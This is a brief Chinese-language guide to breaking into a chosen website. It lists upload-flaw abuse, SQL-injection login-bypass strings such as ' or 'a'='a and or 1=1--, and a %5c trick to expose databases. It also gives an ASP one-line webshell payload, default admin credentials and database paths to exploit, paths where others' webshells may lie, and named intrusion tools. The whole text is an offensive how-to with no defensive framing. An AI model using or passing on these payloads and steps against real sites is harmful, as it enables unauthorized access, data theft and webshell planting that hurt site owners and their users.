指定网站的入侵思路

    首先，观察指定网站。 观察这个网站是动态还是静态的，动态的网站，如ASP、PHP、 JSP等代码编写的站点才容易入侵， 若是静态的（.htm或html）,入侵就没那么容易了。

    如果要入侵的目标站点是动态的，就可以利用动态网站的漏洞来进行入侵。以下是入侵思路：

    1. 上传漏洞
    如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，十有八九有漏洞！有时上传不成功,那是因为Cookies不一样，用WSockExpert取得Cookies，再用DOMAIN上传既可。　
    2. 注入漏洞
    这是由于字符过滤不严造成的。

    3. 暴库:将二级目录中间的"/"换成%5c　

    4. ‘or’=‘or’这是个可以连接SQL的语名句。可以直接进入后台。类似的还有： ’or’’=’　" or "a"="a　　 ’) or (’a’=’a　　 ") or ("a"="a　　or 1=1--　 ’ or ’a’=’a

    5. 社会工程学。说来也很简单，就是猜。

    6. ASP格式数据库写入。就是一句话木马〈%execute request("value")%〉，注意数据库必需得是ASP或ASA的后缀。 

    7. 源码利用：一些网站用的是网上下载来的源码，站长又很懒，什么都不改。比如：默认后台地址，默认数据库，默认管理员帐号、密码等。

    8. 对默认数据库，可以利用别人的WEBSHELL。 
    /Databackup/dvbbs7.MDB
    /bbs/cmd.exe
    /bbs/s-u.exe 
    /data/dvbbs7.mdb 
    /bbs/Data/dvbbs7.MDB 
    /bbs/Databackup/dvbbs7.MDB 
    /bbs/cmd.asp 
    /bbs/servu.exe 
    /bbs/diy.asp
    /diy.asp 
    用到的工具：网站猎手，明小子，挖掘鸡等。